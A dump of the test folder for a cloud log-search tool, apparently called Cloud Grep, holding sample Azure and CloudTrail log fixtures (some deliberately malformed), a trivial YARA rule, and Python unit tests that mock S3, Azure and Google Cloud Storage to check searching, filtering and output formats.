-------------------------------------------------------------------------------- /tests/data/azure_singleline.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "data": { 4 | "authorization": { 5 | "action": "Microsoft.Storage/storageAccounts/listKeys/action", 6 | "scope": "/subscriptions/ji12gbh3jh12b3h12vb3hv123h/resourceGroups/test/providers/Microsoft.Storage/storageAccounts/storagetest" 7 | }, 8 | "caller": "test@email", 9 | "channels": "Operation", 10 | "claims": { 11 | "aud": "https://management.core.windows.net/", 12 | "ver": "1.0", 13 | "xms_cae": "1", 14 | "xms_tcdt": "1231293743" 15 | }, 16 | "correlationId": "b12321j3bhdgscj214j3b12rhv", 17 | "description": "", 18 | "eventDataId": "21371283ghjgfsdb9876123", 19 | "eventName": { 20 | "value": "EndRequest", 21 | "localizedValue": "End request" 22 | }, 23 | "httpRequest": { 24 | "clientRequestId": "9dsfghj1290-381293ghu123gvh123", 25 | "clientIpAddress": "11.11.11.10", 26 | "method": "POST", 27 | "uri": "https://management.azure.com/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest/listKeys?api-version=2022-05-01" 28 | }, 29 | "id": "/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest/events/21371283ghjgfsdb9876123/ticks/2193871283612873612", 30 | "level": "Informational", 31 | "resourceGroupName": "Test", 32 | "resourceProviderName": { 33 | "value": "Microsoft.Storage", 34 | "localizedValue": "Microsoft.Storage" 35 | }, 36 | "resourceId": "/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest", 37 | "operationId": "ac8a903f-315d-421a-8533-84ed10b356cd", 38 | "operationName": { 39 | "value": "Microsoft.Storage/storageAccounts/listKeys/action", 40 | "localizedValue": "List Storage Account Keys" 41 | }, 42 | "status": { 43 | "value": "Succeeded", 44 | "localizedValue": "Succeeded" 45 | }, 46 | "subStatus": { 47 | "value": "OK", 48 | "localizedValue": "OK (HTTP Status Code: 200)" 49 | }, 50 | "tenantId": "12321MN3BNDASVBfD09SFDGSD" 51 | }, 52 | "version": 1, 53 | "eventId": "21371283ghjgfsdb9876123", 54 | "eventType": "AZURE_CLOUD" 55 | } 56 | ] -------------------------------------------------------------------------------- /tests/data/bad_azure.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "data": { 4 | "authorization": { 5 | "action": "Microsoft.Storage/storageAccounts/listKeys/action", 6 | "scope": "/subscriptions/ji12gbh3jh12b3h12vb3hv123h/resourceGroups/test/providers/Microsoft.Storage/storageAccounts/storagetest" 7 | }, 8 | "caller": "test@email", 9 | "channels": "Operation", 10 | "claims": { 11 | "aud": "https://management.core.windows.net/", 12 | "ver": "1.0", 13 | "xms_cae": "1", 14 | "xms_tcdt": "1231293743" 15 | }, 16 | "correlationId": "b12321j3bhdgscj214j3b12rhv", 17 | "description": "", 18 | "eventDataId": "21371283ghjgfsdb9876123", 19 | "eventName": { 20 | "value": "EndRequest", 21 | "localizedValue": "End request" 22 | }, 23 | "httpRequest": { 24 | "clientRequestId": "9dsfghj1290-381293ghu123gvh123", 25 | "clientIpAddress": "11.11.11.10", 26 | "method": "POST", 27 | "uri": "https://management.azure.com/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest/listKeys?api-version=2022-05-01" 28 | }, 29 | 
"id": "/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest/events/21371283ghjgfsdb9876123/ticks/2193871283612873612", 30 | "level": "Informational", 31 | "resourceGroupName": "Test", 32 | "resourceProviderName": { 33 | "value": "Microsoft.Storage", 34 | "localizedValue": "Microsoft.Storage" 35 | }, 36 | "resourceId": "/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest", 37 | "operationId": "ac8a903f-315d-421a-8533-84ed10b356cd", 38 | "operationName": { 39 | "value": "Microsoft.Storage/storageAccounts/listKeys/action", 40 | "localizedValue": "List Storage Account Keys" 41 | }, 42 | "status": { 43 | "value": "Succeeded", 44 | "localizedValue": "Succeeded" 45 | }, 46 | "subStatus": { 47 | "value": "OK", 48 | "localizedValue": "OK (HTTP Status Code: 200)" 49 | }, 50 | "tenantId": "12321MN3BNDASVBfD09SFDGSD" 51 | }, 52 | "version": 1, 53 | "eventId": "21371283ghjgfsdb9876123", 54 | "eventType": "AZURE_CLOUD" 55 | 56 | ] -------------------------------------------------------------------------------- /tests/data/bad_cloudtrail.json: -------------------------------------------------------------------------------- 1 | {"Records": [{ 2 | "eventVersion": "1.08", 3 | "userIdentity": { 4 | "type": "IAMUser", 5 | "principalId": "EXAMPLE6E4XEGITWATV6R", 6 | "arn": "arn:aws:iam::777788889999:user/Nikki", 7 | "accountId": "777788889999", 8 | "accessKeyId": "AKIAI44QH8DHBEXAMPLE", 9 | "userName": "Nikki", 10 | "sessionContext": { 11 | "sessionIssuer": {}, 12 | "webIdFederationData": {}, 13 | "attributes": { 14 | "creationDate": "2023-07-19T21:11:57Z", 15 | "mfaAuthenticated": "false" 16 | } 17 | } 18 | }, 19 | "eventTime": "2023-07-19T21:14:20Z", 20 | "eventSource": "ec2.amazonaws.com", 21 | "eventName": "StopInstances", 22 | "awsRegion": "us-east-1", 23 | "sourceIPAddress": "192.0.2.0", 24 | "userAgent": "aws-cli/2.13.5 Python/3.11.4 Linux/4.14.255-314-253.539.amzn2.x86_64 exec-env/CloudShell exe/x86_64.amzn.2 prompt/off command/ec2.stop-instances", 25 | "requestParameters": { 26 | "instancesSet": { -------------------------------------------------------------------------------- /tests/data/cloudtrail.json: -------------------------------------------------------------------------------- 1 | {"Records": [{ 2 | "eventVersion": "1.08", 3 | "userIdentity": { 4 | "type": "IAMUser", 5 | "principalId": "EXAMPLE6E4XEGITWATV6R", 6 | "arn": "arn:aws:iam::777788889999:user/Nikki", 7 | "accountId": "777788889999", 8 | "accessKeyId": "AKIAI44QH8DHBEXAMPLE", 9 | "userName": "Nikki", 10 | "sessionContext": { 11 | "sessionIssuer": {}, 12 | "webIdFederationData": {}, 13 | "attributes": { 14 | "creationDate": "2023-07-19T21:11:57Z", 15 | "mfaAuthenticated": "false" 16 | } 17 | } 18 | }, 19 | "eventTime": "2023-07-19T21:14:20Z", 20 | "eventSource": "ec2.amazonaws.com", 21 | "eventName": "StopInstances", 22 | "awsRegion": "us-east-1", 23 | "sourceIPAddress": "192.0.2.0", 24 | "userAgent": "aws-cli/2.13.5 Python/3.11.4 Linux/4.14.255-314-253.539.amzn2.x86_64 exec-env/CloudShell exe/x86_64.amzn.2 prompt/off command/ec2.stop-instances", 25 | "requestParameters": { 26 | "instancesSet": { 27 | "items": [ 28 | { 29 | "instanceId": "i-EXAMPLE56126103cb" 30 | }, 31 | { 32 | "instanceId": "i-EXAMPLEaff4840c22" 33 | } 34 | ] 35 | }, 36 | "force": false 37 | }, 38 | "responseElements": { 39 | "requestId": "c308a950-e43e-444e-afc1-EXAMPLE73e49", 40 | "instancesSet": { 41 | 
"items": [ 42 | { 43 | "instanceId": "i-EXAMPLE56126103cb", 44 | "currentState": { 45 | "code": 64, 46 | "name": "stopping" 47 | }, 48 | "previousState": { 49 | "code": 16, 50 | "name": "running" 51 | } 52 | }, 53 | { 54 | "instanceId": "i-EXAMPLEaff4840c22", 55 | "currentState": { 56 | "code": 64, 57 | "name": "stopping" 58 | }, 59 | "previousState": { 60 | "code": 16, 61 | "name": "running" 62 | } 63 | } 64 | ] 65 | } 66 | }, 67 | "requestID": "c308a950-e43e-444e-afc1-EXAMPLE73e49", 68 | "eventID": "9357a8cc-a0eb-46a1-b67e-EXAMPLE19b14", 69 | "readOnly": false, 70 | "eventType": "AwsApiCall", 71 | "managementEvent": true, 72 | "recipientAccountId": "777788889999", 73 | "eventCategory": "Management", 74 | "tlsDetails": { 75 | "tlsVersion": "TLSv1.2", 76 | "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", 77 | "clientProvidedHostHeader": "ec2.us-east-1.amazonaws.com" 78 | }, 79 | "sessionCredentialFromConsole": "true" 80 | }]} -------------------------------------------------------------------------------- /tests/data/cloudtrail_singleline.json: -------------------------------------------------------------------------------- 1 | {"Records":[{"eventVersion":"1.07","userIdentity":{"type":"AWSService","invokedBy":"cloudtrail.amazonaws.com"},"eventTime":"2020-07-31T23:58:37Z","eventSource":"s3.amazonaws.com","eventName":"PutObject","awsRegion":"us-east-1","sourceIPAddress":"cloudtrail.amazonaws.com","userAgent":"cloudtrail.amazonaws.com","requestParameters":{"bucketName":"some-bucket","Host":"some-bucket.s3.us-east-1.amazonaws.com","x-amz-acl":"bucket-owner-full-control","x-amz-server-side-encryption":"AES256","key":"AWSLogs/001/CloudTrail/us-east-1/2020/07/31/001_CloudTrail_us-east-1_20200731T2355Z_CPLMUNn9xXPXF33D.json.gz"},"responseElements":{"x-amz-server-side-encryption":"AES256"},"additionalEventData":{"SignatureVersion":"SigV4","CipherSuite":"ECDHE-RSA-AES128-SHA","bytesTransferredIn":791.0,"SSEApplied":"SSE_S3","AuthenticationMethod":"AuthHeader","x-amz-id-2":"rIbGKbhONVn+srdOdwCMERdRiHHFSgs8lvCJdFyCnR8O/r0KnwMQxPayr0rpNm/TlpfjFSLmZgw=","bytesTransferredOut":0.0},"requestID":"4C47E7CE1CBA28F9","eventID":"25d2f1da-c4ac-4201-9c97-e50869d6a636","readOnly":false,"resources":[{"type":"AWS::S3::Object","ARN":"arn:aws:s3:::some-bucket/AWSLogs/001/CloudTrail/us-east-1/2020/07/31/001_CloudTrail_us-east-1_20200731T2355Z_CPLMUNn9xXPXF33D.json.gz"},{"accountId":"001","type":"AWS::S3::Bucket","ARN":"arn:aws:s3:::some-bucket"}],"eventType":"AwsApiCall","managementEvent":false,"recipientAccountId":"001","sharedEventID":"d3a02cbc-7a82-4248-a81b-90074c2579a6","eventCategory":"Data"}]} -------------------------------------------------------------------------------- /tests/data/yara.rule: -------------------------------------------------------------------------------- 1 | rule get 2 | { 3 | strings: 4 | $get = "GET" nocase wide ascii 5 | condition: 6 | $get 7 | } -------------------------------------------------------------------------------- /tests/test_unit.py: -------------------------------------------------------------------------------- 1 | """ 2 | Basic unit tests for Cloud Grep 3 | python3 -m unittest discover tests 4 | """ 5 | 6 | import unittest 7 | import os 8 | import boto3 9 | from google.cloud import storage # type: ignore 10 | import timeout_decorator 11 | from moto import mock_aws 12 | from datetime import datetime 13 | from unittest.mock import patch, MagicMock 14 | import yara # type: ignore 15 | from io import StringIO 16 | from typing import List, BinaryIO 17 | import json 18 | import sys 
19 | import csv 20 | 21 | from cloudgrep.cloud import Cloud 22 | from cloudgrep.search import Search 23 | from cloudgrep.cloudgrep import CloudGrep 24 | 25 | 26 | BASE_PATH = os.path.dirname(os.path.realpath(__file__)) 27 | 28 | 29 | class CloudGrepTests(unittest.TestCase): 30 | """Tests for Cloud Grep""" 31 | 32 | def test_weird_files(self) -> None: 33 | for filename in os.listdir(f"{BASE_PATH}/data/"): 34 | # Just checks we don't crash on any files 35 | Search().get_all_strings_line(f"{BASE_PATH}/data/" + filename) 36 | 37 | self.assertIn("SomeLine", Search().get_all_strings_line(f"{BASE_PATH}/data/14_3.log")) 38 | 39 | def test_gzip(self) -> None: 40 | found = Search().search_file(f"{BASE_PATH}/data/000000.gz", "000000.gz", ["Running on machine"], False, None) 41 | self.assertTrue(found) 42 | 43 | def test_zip(self) -> None: 44 | found = Search().search_file(f"{BASE_PATH}/data/000000.zip", "000000.zip", ["Running on machine"], False, None) 45 | self.assertTrue(found) 46 | 47 | def test_print_match(self) -> None: 48 | with patch("sys.stdout", new=StringIO()) as fake_out: 49 | Search().search_file(f"{BASE_PATH}/data/000000.zip", "000000.zip", ["Running on machine"], False, None) 50 | output = fake_out.getvalue().strip() 51 | self.assertIn("Running on machine", output) 52 | 53 | @timeout_decorator.timeout(5) 54 | @mock_aws 55 | def test_e2e(self) -> None: 56 | # This test uploads a couple of logs to mock S3 57 | # then searches them 58 | _BUCKET = "mybucket" 59 | _QUERY = ["SomeLine"] 60 | 61 | conn = boto3.resource("s3", region_name="us-east-1") 62 | conn.create_bucket(Bucket=_BUCKET) 63 | s3 = boto3.client("s3", region_name="us-east-1") 64 | 65 | # All contain "SomeLine" 66 | for file_name in ["14_3.log", "35010_7.log", "apache_access.log"]: 67 | with open(f"{BASE_PATH}/data/{file_name}", "rb") as data: 68 | s3.upload_fileobj(data, _BUCKET, file_name) 69 | 70 | print("Checking we include every file") 71 | matching_keys = list(Cloud().get_objects(_BUCKET, "", None, None, None, 100000)) 72 | self.assertEqual(len(matching_keys), 3) 73 | 74 | print(f"Checking we get 3 hits for SomeLine in: {matching_keys}") 75 | hits = Cloud().download_from_s3_multithread(_BUCKET, matching_keys, _QUERY, False, None) 76 | self.assertEqual(hits, 3) 77 | 78 | print("Testing with multiple queries from a file") 79 | file = "queries.txt" 80 | with open(file, "w") as f: 81 | f.write(f"query1\n{_QUERY[0]}\nquery3")  # include the real search term among decoys 82 | multi_query = CloudGrep().load_queries(file) 83 | hits = Cloud().download_from_s3_multithread(_BUCKET, matching_keys, multi_query, False, None) 84 | self.assertEqual(hits, 3) 85 | 86 | # Upload 1000 logs 87 | for x in range(1000): 88 | with open(f"{BASE_PATH}/data/apache_access.log", "rb") as data: 89 | s3.upload_fileobj(data, _BUCKET, str(x)) 90 | 91 | Cloud().download_from_s3_multithread(_BUCKET, matching_keys, _QUERY, False, None) 92 | 93 | def test_object_not_empty_and_size_greater_than_file_size(self) -> None: 94 | obj = {"last_modified": datetime(2022, 1, 1), "size": 1000, "name": "example_file.txt"} 95 | key_contains = "example" 96 | from_date = datetime(2021, 1, 1) 97 | to_date = datetime(2023, 1, 1) 98 | file_size = 500 99 | result = Cloud().filter_object_azure(obj, key_contains, from_date, to_date, file_size) # type: ignore 100 | self.assertFalse(result) 101 | file_size = 500000 102 | result = Cloud().filter_object_azure(obj, key_contains, from_date, to_date, file_size) # type: ignore 103 | self.assertTrue(result) 104 | 105 | def test_returns_true_if_all_conditions_are_met(self) -> None: 106 | 
obj = storage.blob.Blob(name="example_file.txt", bucket="example_bucket") 107 | key_contains = "example" 108 | from_date = datetime(2021, 1, 1) 109 | to_date = datetime(2023, 1, 1) 110 | result = Cloud().filter_object_google(obj, key_contains, from_date, to_date) 111 | self.assertTrue(result) 112 | 113 | def test_returns_string_with_file_contents(self) -> None: 114 | file = "queries.txt" 115 | with open(file, "w") as f: 116 | f.write("query1\nquery2\nquery3") 117 | queries = CloudGrep().load_queries(file) 118 | self.assertIsInstance(queries, List) 119 | self.assertEqual(queries, ["query1", "query2", "query3"]) 120 | 121 | def test_yara(self) -> None: 122 | file_name = "valid_file.txt" 123 | key_name = "key_name" 124 | hide_filenames = True 125 | yara_rules = yara.compile(source='rule rule_name {strings: $a = "get" nocase wide ascii condition: $a}') 126 | with open(file_name, "w") as f: 127 | f.write("one\nget stuff\nthree") 128 | 129 | with patch("sys.stdout", new=StringIO()) as fake_out: 130 | matched = Search().yara_scan_file(file_name, key_name, hide_filenames, yara_rules, True) 131 | output = fake_out.getvalue().strip() 132 | 133 | self.assertTrue(matched) 134 | self.assertEqual(output, "{'match_rule': 'rule_name', 'match_strings': [$a]}") 135 | 136 | def test_json_output(self) -> None: 137 | with patch("sys.stdout", new=StringIO()) as fake_out: 138 | Search().search_file( 139 | f"{BASE_PATH}/data/000000.gz", "000000.gz", ["Running on machine"], False, None, None, [], True 140 | ) 141 | output = fake_out.getvalue().strip() 142 | 143 | self.assertTrue(json.loads(output)) 144 | 145 | def test_search_cloudtrail(self) -> None: 146 | log_format = "json" 147 | log_properties = ["Records"] 148 | Search().search_file( 149 | f"{BASE_PATH}/data/bad_cloudtrail.json", 150 | "bad_cloudtrail.json", 151 | ["Running on machine"], 152 | False, 153 | None, 154 | log_format, 155 | log_properties, 156 | ) 157 | Search().search_file( 158 | f"{BASE_PATH}/data/cloudtrail.json", 159 | "cloudtrail.json", 160 | ["Running on machine"], 161 | False, 162 | None, 163 | log_format, 164 | log_properties, 165 | ) 166 | with patch("sys.stdout", new=StringIO()) as fake_out: 167 | Search().search_file( 168 | f"{BASE_PATH}/data/cloudtrail_singleline.json", 169 | "cloudtrail_singleline.json", 170 | ["SignatureVersion"], 171 | False, 172 | None, 173 | log_format, 174 | log_properties, 175 | True, 176 | ) 177 | output = fake_out.getvalue().strip() 178 | self.assertIn("SignatureVersion", output) 179 | self.assertTrue(json.loads(output)) 180 | 181 | def test_filter_object_s3_empty_file(self) -> None: 182 | obj = {"LastModified": datetime(2023, 1, 1), "Size": 0, "Key": "empty_file.log"} 183 | key_contains = "empty" 184 | from_date = datetime(2022, 1, 1) 185 | to_date = datetime(2024, 1, 1) 186 | file_size = 10000 187 | self.assertFalse( 188 | Cloud().filter_object(obj, key_contains, from_date, to_date, file_size), 189 | "Empty file should have been filtered out", 190 | ) 191 | 192 | def test_filter_object_s3_out_of_date_range(self) -> None: 193 | obj = {"LastModified": datetime(2021, 1, 1), "Size": 500, "Key": "old_file.log"} 194 | key_contains = "old" 195 | from_date = datetime(2022, 1, 1) 196 | to_date = datetime(2024, 1, 1) 197 | file_size = 10000 198 | self.assertFalse( 199 | Cloud().filter_object(obj, key_contains, from_date, to_date, file_size), 200 | "Object older than from_date should not match", 201 | ) 202 | 203 | def test_search_logs_csv_format(self) -> None: 204 | line = "col1,col2\nval1,val2" 205 | mock_return = 
[{"col1": "val1", "col2": "val2"}] 206 | with patch.object(csv, "DictReader", return_value=mock_return): 207 | with patch("sys.stdout", new=StringIO()) as fake_out: 208 | Search().search_logs( 209 | line, 210 | key_name="test_csv", 211 | search="val1", 212 | hide_filenames=False, 213 | log_format="csv", 214 | log_properties=[], 215 | json_output=False, 216 | ) 217 | self.assertIn("val1", fake_out.getvalue()) 218 | 219 | def test_search_logs_unknown_format(self) -> None: 220 | line = '{"foo": "bar"}' 221 | with patch("sys.stdout", new=StringIO()): 222 | with patch("logging.error") as mock_log: 223 | Search().search_logs( 224 | line, 225 | key_name="unknown_format.log", 226 | search="bar", 227 | hide_filenames=False, 228 | log_format="not_a_real_format", 229 | log_properties=[], 230 | json_output=False, 231 | ) 232 | mock_log.assert_called_once() 233 | 234 | @mock_aws 235 | def test_cloudgrep_search_no_query_file(self) -> None: 236 | s3 = boto3.resource("s3", region_name="us-east-1") 237 | s3.create_bucket(Bucket="mybucket") 238 | with open("small.log", "w") as f: 239 | f.write("hello direct query") 240 | with open("small.log", "rb") as data: 241 | s3.Bucket("mybucket").put_object(Key="small.log", Body=data) 242 | 243 | cg = CloudGrep() 244 | with patch("sys.stdout", new=StringIO()) as fake_out: 245 | cg.search( 246 | bucket="mybucket", 247 | account_name=None, 248 | container_name=None, 249 | google_bucket=None, 250 | query=["hello"], 251 | file=None, 252 | yara_file=None, 253 | file_size=1000000, 254 | prefix="", 255 | key_contains=None, 256 | from_date=None, 257 | end_date=None, 258 | hide_filenames=False, 259 | log_type=None, 260 | log_format=None, 261 | log_properties=[], 262 | profile=None, 263 | json_output=False, 264 | ) 265 | output = fake_out.getvalue().strip() 266 | self.assertIn("hello direct query", output) 267 | 268 | @mock_aws 269 | def test_cloudgrep_search_with_profile(self) -> None: 270 | s3 = boto3.resource("s3", region_name="us-east-1") 271 | s3.create_bucket(Bucket="prof-bucket") 272 | with open("small.log", "w") as f: 273 | f.write("Hello test profile") 274 | with open("small.log", "rb") as data: 275 | s3.Bucket("prof-bucket").put_object(Key="small.log", Body=data) 276 | 277 | with patch("boto3.setup_default_session") as mock_setup_session: 278 | cg = CloudGrep() 279 | cg.search( 280 | bucket="prof-bucket", 281 | account_name=None, 282 | container_name=None, 283 | google_bucket=None, 284 | query=["Hello"], 285 | file=None, 286 | yara_file=None, 287 | file_size=1000000, 288 | prefix="", 289 | key_contains=None, 290 | from_date=None, 291 | end_date=None, 292 | hide_filenames=False, 293 | log_type=None, 294 | log_format=None, 295 | log_properties=[], 296 | profile="my_aws_profile", 297 | json_output=False, 298 | ) 299 | mock_setup_session.assert_called_with(profile_name="my_aws_profile") 300 | 301 | def test_main_no_args_shows_help(self) -> None: 302 | from cloudgrep.__main__ import main 303 | 304 | with patch.object(sys, "argv", ["prog"]): 305 | # Argparse prints help to sys.stderr 306 | with patch("sys.stderr", new=StringIO()) as fake_err: 307 | with self.assertRaises(SystemExit): 308 | main() 309 | self.assertIn("usage: prog", fake_err.getvalue()) 310 | 311 | @patch("cloudgrep.cloud.BlobServiceClient.from_connection_string") 312 | def test_azure_search_mocked(self, mock_service_client: MagicMock) -> None: 313 | # Mock azure client to do basic azure test 314 | 315 | container_client = MagicMock() 316 | mock_service_client.return_value.get_container_client.return_value = 
container_client 317 | 318 | blob_mock = MagicMock() 319 | blob_mock.name = "testblob.log" 320 | blob_mock.size = 50 321 | blob_mock.last_modified = datetime(2022, 1, 1) 322 | container_client.list_blobs.return_value = [blob_mock] 323 | 324 | blob_client_mock = MagicMock() 325 | container_client.get_blob_client.return_value = blob_client_mock 326 | 327 | # Actually written to a local file 328 | fake_content = b"Some Azure log entry that mentions azure target" 329 | 330 | def fake_readinto_me(file_obj: BinaryIO) -> None: 331 | file_obj.write(fake_content) 332 | 333 | blob_data_mock = MagicMock() 334 | blob_data_mock.readinto.side_effect = fake_readinto_me 335 | blob_client_mock.download_blob.return_value = blob_data_mock 336 | 337 | with patch("sys.stdout", new=StringIO()) as fake_out: 338 | CloudGrep().search( 339 | bucket=None, 340 | account_name="fakeaccount", 341 | container_name="fakecontainer", 342 | google_bucket=None, 343 | query=["azure target"], # Our search term 344 | file=None, 345 | yara_file=None, 346 | file_size=1000000, 347 | prefix=None, 348 | key_contains=None, 349 | from_date=None, 350 | end_date=None, 351 | hide_filenames=False, 352 | log_type=None, 353 | log_format=None, 354 | log_properties=[], 355 | profile=None, 356 | json_output=False, 357 | ) 358 | output = fake_out.getvalue().strip() 359 | 360 | # Check in fake file 361 | self.assertIn("azure target", output, "Should match the azure target text in the downloaded content") 362 | 363 | @patch("cloudgrep.cloud.storage.Client") 364 | def test_google_search_mocked(self, mock_storage_client: MagicMock) -> None: 365 | # Basic coverage for gcp search 366 | bucket_mock = MagicMock() 367 | mock_storage_client.return_value.get_bucket.return_value = bucket_mock 368 | 369 | blob_mock = MagicMock() 370 | blob_mock.name = "test_gcs_file.log" 371 | blob_mock.updated = datetime(2023, 1, 1) 372 | bucket_mock.list_blobs.return_value = [blob_mock] 373 | 374 | def fake_download_to_filename(local_path: str) -> None: 375 | with open(local_path, "wb") as f: 376 | f.write(b"This is some fake file: google target") 377 | 378 | blob_mock.download_to_filename.side_effect = fake_download_to_filename 379 | 380 | with patch("sys.stdout", new=StringIO()) as fake_out: 381 | CloudGrep().search( 382 | bucket=None, 383 | account_name=None, 384 | container_name=None, 385 | google_bucket="fake-gcs-bucket", 386 | query=["google target"], 387 | file=None, 388 | yara_file=None, 389 | file_size=1000000, 390 | prefix=None, 391 | key_contains=None, 392 | from_date=None, 393 | end_date=None, 394 | hide_filenames=False, 395 | log_type=None, 396 | log_format=None, 397 | log_properties=[], 398 | profile=None, 399 | json_output=False, 400 | ) 401 | output = fake_out.getvalue().strip() 402 | 403 | self.assertIn("google target", output, "Should match the google target text in the downloaded content") 404 | 405 | @mock_aws 406 | def test_list_files_returns_pre_filtered_files(self) -> None: 407 | """ 408 | Test that list_files() returns only the S3 objects that match 409 | the specified filters (e.g. key substring and non‑empty content). 
410 | """ 411 | bucket_name = "list-files-test-bucket" 412 | # Create a fake S3 bucket 413 | s3_resource = boto3.resource("s3", region_name="us-east-1") 414 | s3_resource.create_bucket(Bucket=bucket_name) 415 | s3_client = boto3.client("s3", region_name="us-east-1") 416 | 417 | # Upload several objects: 418 | # - Two objects that match 419 | s3_client.put_object(Bucket=bucket_name, Key="log_file1.txt", Body=b"dummy content") 420 | s3_client.put_object(Bucket=bucket_name, Key="log_file2.txt", Body=b"dummy content") 421 | # Onne that doesnt match the key_contains filter 422 | s3_client.put_object(Bucket=bucket_name, Key="not_a_thing.txt", Body=b"dummy content") 423 | # One that doesnt match the file_size filter 424 | s3_client.put_object(Bucket=bucket_name, Key="log_empty.txt", Body=b"") 425 | 426 | # Call list files 427 | cg = CloudGrep() 428 | result = cg.list_files( 429 | bucket=bucket_name, 430 | account_name=None, 431 | container_name=None, 432 | google_bucket=None, 433 | prefix="", 434 | key_contains="log", 435 | from_date=None, 436 | end_date=None, 437 | file_size=1000000 # 1 MB 438 | ) 439 | 440 | # Assert only the matching files are returned 441 | self.assertIn("s3", result) 442 | expected_keys = {"log_file1.txt", "log_file2.txt"} 443 | self.assertEqual(set(result["s3"]), expected_keys) 444 | 445 | # Now search the contents of the files and assert they hit 446 | for key in expected_keys: 447 | with patch("sys.stdout", new=StringIO()) as fake_out: 448 | cg.search( 449 | bucket=bucket_name, 450 | account_name=None, 451 | container_name=None, 452 | google_bucket=None, 453 | query=["dummy content"], 454 | file=None, 455 | yara_file=None, 456 | file_size=1000000, 457 | prefix="", 458 | key_contains=key, 459 | from_date=None, 460 | end_date=None, 461 | hide_filenames=False, 462 | log_type=None, 463 | log_format=None, 464 | log_properties=[], 465 | profile=None, 466 | json_output=False, 467 | files=result, # Pass the pre-filtered files from list_files 468 | ) 469 | output = fake_out.getvalue().strip() 470 | self.assertIn("log_file1.txt", output) --------------------------------------------------------------------------------